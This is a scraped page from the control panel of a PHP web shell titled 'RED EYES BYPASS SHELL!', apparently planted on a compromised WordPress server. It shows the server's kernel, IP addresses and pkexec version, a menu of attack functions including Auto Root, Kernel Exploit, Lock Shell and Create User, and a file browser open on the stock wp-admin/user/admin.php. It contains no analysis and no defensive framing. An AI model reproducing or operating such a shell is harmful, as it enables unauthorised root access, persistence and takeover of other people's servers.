Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
wp900 /
itservice /
wp-admin /
user /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
about.php
257
B
-rw-r--r--
admin.php
865
B
-rw-r--r--
contribute.php
267
B
-rw-r--r--
credits.php
261
B
-rw-r--r--
freedoms.php
263
B
-rw-r--r--
index.php
251
B
-rw-r--r--
menu.php
758
B
-rw-r--r--
privacy.php
261
B
-rw-r--r--
profile.php
252
B
-rw-r--r--
user-edit.php
250
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin.php
<?php /** * WordPress User Administration Bootstrap * * @package WordPress * @subpackage Administration * @since 3.1.0 */ define( 'WP_USER_ADMIN', true ); require_once dirname( __DIR__ ) . '/admin.php'; if ( ! is_multisite() ) { wp_redirect( admin_url() ); exit; } $redirect_user_admin_request = ( 0 !== strcasecmp( $current_blog->domain, $current_site->domain ) || 0 !== strcasecmp( $current_blog->path, $current_site->path ) ); /** * Filters whether to redirect the request to the User Admin in Multisite. * * @since 3.2.0 * * @param bool $redirect_user_admin_request Whether the request should be redirected. */ $redirect_user_admin_request = apply_filters( 'redirect_user_admin_request', $redirect_user_admin_request ); if ( $redirect_user_admin_request ) { wp_redirect( user_admin_url() ); exit; } unset( $redirect_user_admin_request );
Close